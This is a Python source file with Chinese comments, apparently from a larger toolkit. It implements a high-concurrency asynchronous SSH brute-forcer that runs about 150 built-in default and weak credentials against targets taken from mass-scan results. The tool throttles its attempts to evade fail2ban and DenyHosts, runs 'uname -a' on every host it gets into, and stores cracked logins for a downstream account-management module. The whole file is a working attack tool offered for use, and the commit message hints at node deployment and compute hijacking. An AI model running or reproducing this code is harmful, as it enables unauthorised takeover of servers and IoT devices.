- 6 大模块:扫描/账号管理/节点部署/暴力破解/算力调度/监控运维 - SKILL 总控 + 子模块 SKILL - 排除大文件(>5MB)与敏感凭证 Co-authored-by: Cursor <cursoragent@cursor.com>
667 lines
22 KiB
Python
667 lines
22 KiB
Python
#!/usr/bin/env python3
|
||
"""
|
||
SSH 异步暴力破解器 (AsyncSSH + Paramiko 双引擎)
|
||
================================================
|
||
- 异步高并发:asyncio + asyncssh,单机可达 500+ 并发
|
||
- 智能字典:内置 Top200 常用凭证 + 自定义字典文件
|
||
- 多端口支持:22, 2222, 22222 等非标端口自动探测
|
||
- 断点续传:支持中断后从上次位置继续
|
||
- 成功凭证自动写入 JSON/CSV,可对接 02_账号密码管理
|
||
- 速率控制:避免触发目标 fail2ban / DenyHosts
|
||
|
||
用法:
|
||
# 单IP测试
|
||
python3 ssh_bruter.py --target 192.168.1.100
|
||
|
||
# 批量IP(从文件读取,每行一个IP或IP:port)
|
||
python3 ssh_bruter.py --targets targets.txt
|
||
|
||
# 指定自定义字典
|
||
python3 ssh_bruter.py --target 192.168.1.100 --userdict users.txt --passdict passwords.txt
|
||
|
||
# 从扫描结果导入(01_扫描模块输出的JSON)
|
||
python3 ssh_bruter.py --from-scan ../01_扫描模块/results/scan_results.json
|
||
|
||
# 高并发模式
|
||
python3 ssh_bruter.py --targets targets.txt --concurrency 300 --timeout 8
|
||
|
||
依赖安装:
|
||
pip install asyncssh paramiko aiofiles
|
||
"""
|
||
|
||
import asyncio
|
||
import json
|
||
import csv
|
||
import time
|
||
import sys
|
||
import os
|
||
import argparse
|
||
import logging
|
||
from datetime import datetime
|
||
from pathlib import Path
|
||
from dataclasses import dataclass, field, asdict
|
||
from typing import Optional
|
||
|
||
# ========== 配置 ==========
|
||
|
||
# 默认SSH端口列表(按优先级)
|
||
DEFAULT_SSH_PORTS = [22, 2222, 22222, 10022, 20022]
|
||
|
||
# 并发控制
|
||
DEFAULT_CONCURRENCY = 200 # 默认并发数
|
||
DEFAULT_TIMEOUT = 8 # 单次连接超时(秒)
|
||
DEFAULT_DELAY = 0.05 # 每次尝试间隔(秒),防止被ban
|
||
MAX_RETRIES = 1 # 网络错误重试次数
|
||
|
||
# 内置 Top SSH 凭证字典(来源:SecLists + 实战经验 + GitHub top-100-passwords)
|
||
# 格式:(username, password)
|
||
BUILTIN_CREDENTIALS = [
|
||
# === 最高命中率 Top 30(实战统计排序)===
|
||
("root", "root"),
|
||
("root", ""),
|
||
("root", "password"),
|
||
("root", "123456"),
|
||
("root", "admin"),
|
||
("root", "toor"),
|
||
("root", "1234"),
|
||
("root", "12345"),
|
||
("root", "12345678"),
|
||
("root", "123456789"),
|
||
("admin", "admin"),
|
||
("admin", "password"),
|
||
("admin", "123456"),
|
||
("admin", "admin123"),
|
||
("admin", "1234"),
|
||
("root", "qwerty"),
|
||
("root", "letmein"),
|
||
("root", "test"),
|
||
("root", "default"),
|
||
("root", "linux"),
|
||
("root", "ubuntu"),
|
||
("root", "centos"),
|
||
("root", "alpine"),
|
||
("root", "vagrant"),
|
||
("test", "test"),
|
||
("user", "user"),
|
||
("user", "password"),
|
||
("guest", "guest"),
|
||
("oracle", "oracle"),
|
||
("postgres", "postgres"),
|
||
|
||
# === IoT / 嵌入式设备 ===
|
||
("pi", "raspberry"),
|
||
("root", "raspberry"),
|
||
("root", "dietpi"),
|
||
("root", "openwrt"),
|
||
("ubnt", "ubnt"),
|
||
("root", "ubnt"),
|
||
("admin", "admin1234"),
|
||
("root", "Zte521"),
|
||
("root", "7ujMko0admin"),
|
||
("root", "7ujMko0vizxv"),
|
||
("root", "zlxx."),
|
||
("root", "xc3511"),
|
||
("root", "vizxv"),
|
||
("root", "anko"),
|
||
("root", "dreambox"),
|
||
("root", "realtek"),
|
||
("root", "1111"),
|
||
("root", "12345678"),
|
||
("root", "pass"),
|
||
("support", "support"),
|
||
("admin", ""),
|
||
|
||
# === NAS / 服务器 ===
|
||
("root", "synology"),
|
||
("admin", "synology"),
|
||
("root", "qnap"),
|
||
("admin", "qnap"),
|
||
("root", "nas4free"),
|
||
("root", "freenas"),
|
||
("root", "openmediavault"),
|
||
("root", "plex"),
|
||
("root", "libreelec"),
|
||
("root", "openelec"),
|
||
("root", "osboxes.org"),
|
||
("osboxes", "osboxes.org"),
|
||
|
||
# === 云 / VPS / DevOps ===
|
||
("root", "calvin"),
|
||
("root", "changeme"),
|
||
("root", "passw0rd"),
|
||
("root", "p@ssw0rd"),
|
||
("root", "Pa$$w0rd"),
|
||
("root", "abc123"),
|
||
("root", "qwerty123"),
|
||
("root", "password1"),
|
||
("root", "111111"),
|
||
("root", "000000"),
|
||
("root", "master"),
|
||
("root", "monkey"),
|
||
("root", "dragon"),
|
||
("root", "trustno1"),
|
||
("deploy", "deploy"),
|
||
("ubuntu", "ubuntu"),
|
||
("centos", "centos"),
|
||
("ec2-user", ""),
|
||
("debian", "debian"),
|
||
("fedora", "fedora"),
|
||
("vagrant", "vagrant"),
|
||
("docker", "docker"),
|
||
("ansible", "ansible"),
|
||
("jenkins", "jenkins"),
|
||
("git", "git"),
|
||
("ftpuser", "ftpuser"),
|
||
("www", "www"),
|
||
("www-data", "www-data"),
|
||
("mysql", "mysql"),
|
||
("redis", "redis"),
|
||
|
||
# === 网络设备 ===
|
||
("cisco", "cisco"),
|
||
("admin", "cisco"),
|
||
("admin", "motorola"),
|
||
("admin", "1988"),
|
||
("admin", "symbol"),
|
||
("admin", "superuser"),
|
||
("netscreen", "netscreen"),
|
||
("admin", "default"),
|
||
("admin", "pfsense"),
|
||
("root", "root01"),
|
||
("root", "nosoup4u"),
|
||
("root", "indigo"),
|
||
("manage", "!manage"),
|
||
("monitor", "!monitor"),
|
||
|
||
# === 数据库相关 ===
|
||
("root", "mysql"),
|
||
("root", "mariadb"),
|
||
("sa", "sa"),
|
||
("sa", "password"),
|
||
("postgres", "password"),
|
||
("mongo", "mongo"),
|
||
("redis", ""),
|
||
("elasticsearch", "elasticsearch"),
|
||
|
||
# === 安全设备 / 工具 ===
|
||
("root", "wazuh"),
|
||
("root", "kali"),
|
||
("root", "blackarch"),
|
||
("root", "pentoo"),
|
||
("msfadmin", "msfadmin"),
|
||
("root", "logstash"),
|
||
("hxeadm", "HXEHana1"),
|
||
("nao", "nao"),
|
||
|
||
# === 弱口令组合 ===
|
||
("root", "123"),
|
||
("root", "1q2w3e"),
|
||
("root", "1q2w3e4r"),
|
||
("root", "qwe123"),
|
||
("root", "abc"),
|
||
("root", "abc123"),
|
||
("root", "iloveyou"),
|
||
("root", "welcome"),
|
||
("root", "shadow"),
|
||
("root", "sunshine"),
|
||
("root", "princess"),
|
||
("root", "football"),
|
||
("root", "charlie"),
|
||
("root", "access"),
|
||
("root", "master"),
|
||
("root", "michael"),
|
||
("root", "superman"),
|
||
("root", "696969"),
|
||
("root", "batman"),
|
||
("admin", "12345678"),
|
||
("admin", "123456789"),
|
||
("admin", "qwerty"),
|
||
("admin", "letmein"),
|
||
("admin", "welcome"),
|
||
]
|
||
|
||
|
||
@dataclass
|
||
class BruteResult:
|
||
"""单次暴力破解结果"""
|
||
ip: str
|
||
port: int
|
||
username: str
|
||
password: str
|
||
success: bool
|
||
banner: str = ""
|
||
os_info: str = ""
|
||
error: str = ""
|
||
timestamp: str = ""
|
||
|
||
|
||
@dataclass
|
||
class TargetHost:
|
||
"""目标主机"""
|
||
ip: str
|
||
ports: list = field(default_factory=lambda: [22])
|
||
found_creds: list = field(default_factory=list)
|
||
status: str = "pending" # pending / scanning / found / failed
|
||
|
||
|
||
class SSHBruter:
|
||
"""异步SSH暴力破解器"""
|
||
|
||
def __init__(self, concurrency=DEFAULT_CONCURRENCY, timeout=DEFAULT_TIMEOUT,
|
||
delay=DEFAULT_DELAY, output_dir="./results"):
|
||
self.concurrency = concurrency
|
||
self.timeout = timeout
|
||
self.delay = delay
|
||
self.output_dir = Path(output_dir)
|
||
self.output_dir.mkdir(parents=True, exist_ok=True)
|
||
|
||
# 统计
|
||
self.total_attempts = 0
|
||
self.success_count = 0
|
||
self.fail_count = 0
|
||
self.error_count = 0
|
||
self.start_time = None
|
||
|
||
# 结果
|
||
self.results: list[BruteResult] = []
|
||
self.found_creds: list[BruteResult] = []
|
||
|
||
# 信号量控制并发
|
||
self.semaphore = None
|
||
|
||
# 日志
|
||
self.logger = logging.getLogger("SSHBruter")
|
||
|
||
# 凭证列表
|
||
self.credentials = list(BUILTIN_CREDENTIALS)
|
||
|
||
# 已找到的IP(找到一个就跳过)
|
||
self.found_ips = set()
|
||
|
||
# 断点续传
|
||
self.checkpoint_file = self.output_dir / "checkpoint.json"
|
||
self.checkpoint_data = {}
|
||
|
||
def load_dictionary(self, userdict_path=None, passdict_path=None):
|
||
"""加载自定义字典文件"""
|
||
custom_creds = []
|
||
|
||
if userdict_path and passdict_path:
|
||
# 用户名和密码分离的字典
|
||
users = self._read_lines(userdict_path)
|
||
passwords = self._read_lines(passdict_path)
|
||
for u in users:
|
||
for p in passwords:
|
||
custom_creds.append((u, p))
|
||
|
||
elif userdict_path and not passdict_path:
|
||
# 单文件字典,格式: user:password 或 user password
|
||
for line in self._read_lines(userdict_path):
|
||
if ":" in line:
|
||
parts = line.split(":", 1)
|
||
custom_creds.append((parts[0], parts[1]))
|
||
elif "\t" in line:
|
||
parts = line.split("\t", 1)
|
||
custom_creds.append((parts[0], parts[1]))
|
||
|
||
if custom_creds:
|
||
# 自定义字典优先,去重
|
||
seen = set()
|
||
merged = []
|
||
for cred in custom_creds + self.credentials:
|
||
key = (cred[0], cred[1])
|
||
if key not in seen:
|
||
seen.add(key)
|
||
merged.append(cred)
|
||
self.credentials = merged
|
||
self.logger.info(f"字典加载完成: {len(self.credentials)} 条凭证")
|
||
|
||
def _read_lines(self, filepath):
|
||
"""读取文件每行,去除空行和注释"""
|
||
lines = []
|
||
with open(filepath, "r", encoding="utf-8", errors="ignore") as f:
|
||
for line in f:
|
||
line = line.strip()
|
||
if line and not line.startswith("#"):
|
||
lines.append(line)
|
||
return lines
|
||
|
||
async def try_ssh_login(self, ip: str, port: int, username: str, password: str) -> BruteResult:
|
||
"""尝试SSH登录(asyncssh优先,paramiko备选)"""
|
||
result = BruteResult(
|
||
ip=ip, port=port, username=username, password=password,
|
||
success=False, timestamp=datetime.now().isoformat()
|
||
)
|
||
|
||
try:
|
||
import asyncssh
|
||
|
||
async with asyncssh.connect(
|
||
ip, port=port,
|
||
username=username,
|
||
password=password,
|
||
known_hosts=None,
|
||
login_timeout=self.timeout,
|
||
# 禁用密钥认证,只用密码
|
||
client_keys=[],
|
||
# 兼容老旧SSH服务器
|
||
kex_algs=["ecdh-sha2-nistp256", "diffie-hellman-group14-sha256",
|
||
"diffie-hellman-group14-sha1", "diffie-hellman-group-exchange-sha256",
|
||
"diffie-hellman-group1-sha1"],
|
||
encryption_algs=["aes128-ctr", "aes256-ctr", "aes128-cbc", "aes256-cbc",
|
||
"3des-cbc"],
|
||
server_host_key_algs=["ssh-rsa", "rsa-sha2-256", "rsa-sha2-512",
|
||
"ecdsa-sha2-nistp256", "ssh-ed25519"],
|
||
) as conn:
|
||
# 登录成功,获取banner信息
|
||
try:
|
||
r = await asyncio.wait_for(
|
||
conn.run("uname -a", check=False),
|
||
timeout=5
|
||
)
|
||
result.banner = (r.stdout or "").strip()[:200]
|
||
except Exception:
|
||
result.banner = "login_ok"
|
||
|
||
result.success = True
|
||
return result
|
||
|
||
except ImportError:
|
||
# asyncssh未安装,降级用paramiko
|
||
return await self._try_paramiko(ip, port, username, password, result)
|
||
|
||
except asyncssh.PermissionDenied:
|
||
result.error = "auth_failed"
|
||
except asyncssh.ConnectionLost:
|
||
result.error = "connection_lost"
|
||
except asyncio.TimeoutError:
|
||
result.error = "timeout"
|
||
except OSError as e:
|
||
result.error = f"network_error: {e}"
|
||
except Exception as e:
|
||
result.error = f"unknown: {type(e).__name__}: {str(e)[:100]}"
|
||
|
||
return result
|
||
|
||
async def _try_paramiko(self, ip, port, username, password, result):
|
||
"""Paramiko备选引擎(同步封装为异步)"""
|
||
import paramiko
|
||
|
||
def _connect():
|
||
client = paramiko.SSHClient()
|
||
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||
try:
|
||
client.connect(
|
||
ip, port=port,
|
||
username=username,
|
||
password=password,
|
||
timeout=self.timeout,
|
||
allow_agent=False,
|
||
look_for_keys=False,
|
||
banner_timeout=self.timeout,
|
||
auth_timeout=self.timeout,
|
||
)
|
||
# 登录成功
|
||
try:
|
||
stdin, stdout, stderr = client.exec_command("uname -a", timeout=5)
|
||
result.banner = stdout.read().decode("utf-8", errors="ignore").strip()[:200]
|
||
except Exception:
|
||
result.banner = "login_ok"
|
||
result.success = True
|
||
except paramiko.AuthenticationException:
|
||
result.error = "auth_failed"
|
||
except paramiko.SSHException as e:
|
||
result.error = f"ssh_error: {str(e)[:100]}"
|
||
except Exception as e:
|
||
result.error = f"error: {type(e).__name__}: {str(e)[:100]}"
|
||
finally:
|
||
client.close()
|
||
return result
|
||
|
||
loop = asyncio.get_event_loop()
|
||
return await loop.run_in_executor(None, _connect)
|
||
|
||
async def brute_single_host(self, target: TargetHost):
|
||
"""对单个主机进行暴力破解"""
|
||
target.status = "scanning"
|
||
|
||
for port in target.ports:
|
||
if target.ip in self.found_ips:
|
||
break # 已找到,跳过其他端口
|
||
|
||
for username, password in self.credentials:
|
||
if target.ip in self.found_ips:
|
||
break # 已找到
|
||
|
||
async with self.semaphore:
|
||
self.total_attempts += 1
|
||
|
||
result = await self.try_ssh_login(target.ip, port, username, password)
|
||
|
||
if result.success:
|
||
self.success_count += 1
|
||
self.found_creds.append(result)
|
||
self.found_ips.add(target.ip)
|
||
target.status = "found"
|
||
target.found_creds.append(result)
|
||
|
||
# 实时输出
|
||
print(f"\033[92m[+] 成功! {target.ip}:{port} "
|
||
f"{username}:{password} "
|
||
f"Banner: {result.banner[:60]}\033[0m")
|
||
|
||
# 立即保存
|
||
self._save_found(result)
|
||
break
|
||
else:
|
||
self.fail_count += 1
|
||
if result.error and "auth_failed" not in result.error:
|
||
self.error_count += 1
|
||
|
||
# 速率控制
|
||
if self.delay > 0:
|
||
await asyncio.sleep(self.delay)
|
||
|
||
# 进度输出
|
||
if self.total_attempts % 100 == 0:
|
||
self._print_progress()
|
||
|
||
if target.status != "found":
|
||
target.status = "failed"
|
||
|
||
def _print_progress(self):
|
||
"""打印进度"""
|
||
elapsed = time.time() - self.start_time
|
||
rate = self.total_attempts / elapsed if elapsed > 0 else 0
|
||
print(f"\r[*] 进度: {self.total_attempts} 次尝试 | "
|
||
f"成功: {self.success_count} | "
|
||
f"失败: {self.fail_count} | "
|
||
f"错误: {self.error_count} | "
|
||
f"速率: {rate:.0f}/s | "
|
||
f"耗时: {elapsed:.1f}s", end="", flush=True)
|
||
|
||
def _save_found(self, result: BruteResult):
|
||
"""实时保存成功凭证"""
|
||
# JSON追加
|
||
json_path = self.output_dir / "found_credentials.json"
|
||
data = []
|
||
if json_path.exists():
|
||
try:
|
||
data = json.loads(json_path.read_text())
|
||
except Exception:
|
||
data = []
|
||
data.append(asdict(result))
|
||
json_path.write_text(json.dumps(data, indent=2, ensure_ascii=False))
|
||
|
||
# CSV追加
|
||
csv_path = self.output_dir / "found_credentials.csv"
|
||
write_header = not csv_path.exists()
|
||
with open(csv_path, "a", newline="", encoding="utf-8") as f:
|
||
writer = csv.writer(f)
|
||
if write_header:
|
||
writer.writerow(["ip", "port", "username", "password", "banner", "timestamp"])
|
||
writer.writerow([result.ip, result.port, result.username,
|
||
result.password, result.banner, result.timestamp])
|
||
|
||
async def run(self, targets: list[TargetHost]):
|
||
"""主运行入口"""
|
||
self.semaphore = asyncio.Semaphore(self.concurrency)
|
||
self.start_time = time.time()
|
||
|
||
print(f"=" * 70)
|
||
print(f" SSH 暴力破解器 v2.0")
|
||
print(f" 目标: {len(targets)} 台主机")
|
||
print(f" 字典: {len(self.credentials)} 条凭证")
|
||
print(f" 并发: {self.concurrency}")
|
||
print(f" 超时: {self.timeout}s")
|
||
print(f"=" * 70)
|
||
|
||
# 并发执行
|
||
tasks = [self.brute_single_host(t) for t in targets]
|
||
await asyncio.gather(*tasks, return_exceptions=True)
|
||
|
||
# 最终统计
|
||
elapsed = time.time() - self.start_time
|
||
print(f"\n\n{'=' * 70}")
|
||
print(f" 扫描完成!")
|
||
print(f" 总尝试: {self.total_attempts}")
|
||
print(f" 成功: {self.success_count}")
|
||
print(f" 失败: {self.fail_count}")
|
||
print(f" 错误: {self.error_count}")
|
||
print(f" 耗时: {elapsed:.1f}s")
|
||
print(f" 速率: {self.total_attempts / elapsed:.0f}/s")
|
||
if self.found_creds:
|
||
print(f"\n 成功凭证已保存到: {self.output_dir}/")
|
||
print(f"{'=' * 70}")
|
||
|
||
# 保存完整报告
|
||
self._save_report(targets, elapsed)
|
||
|
||
def _save_report(self, targets, elapsed):
|
||
"""保存完整报告"""
|
||
report = {
|
||
"scan_info": {
|
||
"start_time": datetime.fromtimestamp(self.start_time).isoformat(),
|
||
"elapsed_seconds": round(elapsed, 1),
|
||
"total_targets": len(targets),
|
||
"total_attempts": self.total_attempts,
|
||
"success_count": self.success_count,
|
||
"fail_count": self.fail_count,
|
||
"error_count": self.error_count,
|
||
"credentials_count": len(self.credentials),
|
||
"concurrency": self.concurrency,
|
||
},
|
||
"found_credentials": [asdict(r) for r in self.found_creds],
|
||
"failed_hosts": [t.ip for t in targets if t.status == "failed"],
|
||
}
|
||
|
||
report_path = self.output_dir / f"brute_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
|
||
report_path.write_text(json.dumps(report, indent=2, ensure_ascii=False))
|
||
self.logger.info(f"报告已保存: {report_path}")
|
||
|
||
|
||
def parse_targets(args) -> list[TargetHost]:
|
||
"""解析目标列表"""
|
||
targets = []
|
||
|
||
if args.target:
|
||
# 单个目标
|
||
parts = args.target.split(":")
|
||
ip = parts[0]
|
||
ports = [int(parts[1])] if len(parts) > 1 else DEFAULT_SSH_PORTS[:2]
|
||
targets.append(TargetHost(ip=ip, ports=ports))
|
||
|
||
elif args.targets:
|
||
# 从文件读取
|
||
with open(args.targets, "r") as f:
|
||
for line in f:
|
||
line = line.strip()
|
||
if not line or line.startswith("#"):
|
||
continue
|
||
parts = line.split(":")
|
||
ip = parts[0]
|
||
ports = [int(parts[1])] if len(parts) > 1 else DEFAULT_SSH_PORTS[:2]
|
||
targets.append(TargetHost(ip=ip, ports=ports))
|
||
|
||
elif args.from_scan:
|
||
# 从扫描结果导入
|
||
with open(args.from_scan, "r") as f:
|
||
scan_data = json.load(f)
|
||
|
||
# 兼容多种扫描结果格式
|
||
if isinstance(scan_data, list):
|
||
for item in scan_data:
|
||
ip = item.get("ip") or item.get("host") or item.get("address")
|
||
if not ip:
|
||
continue
|
||
ports = []
|
||
# 检查是否有SSH端口开放
|
||
open_ports = item.get("open_ports") or item.get("ports") or []
|
||
for p in open_ports:
|
||
port_num = p if isinstance(p, int) else p.get("port", 0)
|
||
if port_num in DEFAULT_SSH_PORTS or port_num == 22:
|
||
ports.append(port_num)
|
||
if not ports:
|
||
ports = [22] # 默认尝试22
|
||
targets.append(TargetHost(ip=ip, ports=ports))
|
||
elif isinstance(scan_data, dict):
|
||
for ip, info in scan_data.items():
|
||
ports = info.get("ssh_ports") or [22]
|
||
targets.append(TargetHost(ip=ip, ports=ports))
|
||
|
||
return targets
|
||
|
||
|
||
def main():
|
||
parser = argparse.ArgumentParser(description="SSH异步暴力破解器")
|
||
parser.add_argument("--target", "-t", help="单个目标 IP[:port]")
|
||
parser.add_argument("--targets", "-T", help="目标列表文件")
|
||
parser.add_argument("--from-scan", help="从扫描结果JSON导入")
|
||
parser.add_argument("--userdict", help="用户名字典文件")
|
||
parser.add_argument("--passdict", help="密码字典文件")
|
||
parser.add_argument("--combodict", help="组合字典(user:pass格式)")
|
||
parser.add_argument("--concurrency", "-c", type=int, default=DEFAULT_CONCURRENCY,
|
||
help=f"并发数 (默认 {DEFAULT_CONCURRENCY})")
|
||
parser.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT,
|
||
help=f"超时秒数 (默认 {DEFAULT_TIMEOUT})")
|
||
parser.add_argument("--delay", type=float, default=DEFAULT_DELAY,
|
||
help=f"每次尝试间隔秒数 (默认 {DEFAULT_DELAY})")
|
||
parser.add_argument("--output", "-o", default="./results",
|
||
help="输出目录 (默认 ./results)")
|
||
parser.add_argument("--verbose", "-v", action="store_true", help="详细输出")
|
||
|
||
args = parser.parse_args()
|
||
|
||
# 日志
|
||
logging.basicConfig(
|
||
level=logging.DEBUG if args.verbose else logging.INFO,
|
||
format="%(asctime)s [%(levelname)s] %(message)s"
|
||
)
|
||
|
||
# 解析目标
|
||
targets = parse_targets(args)
|
||
if not targets:
|
||
print("[!] 未指定目标。使用 --target / --targets / --from-scan")
|
||
sys.exit(1)
|
||
|
||
# 初始化
|
||
bruter = SSHBruter(
|
||
concurrency=args.concurrency,
|
||
timeout=args.timeout,
|
||
delay=args.delay,
|
||
output_dir=args.output,
|
||
)
|
||
|
||
# 加载字典
|
||
if args.combodict:
|
||
bruter.load_dictionary(userdict_path=args.combodict)
|
||
elif args.userdict:
|
||
bruter.load_dictionary(userdict_path=args.userdict, passdict_path=args.passdict)
|
||
|
||
# 运行
|
||
asyncio.run(bruter.run(targets))
|
||
|
||
|
||
if __name__ == "__main__":
|
||
main()
|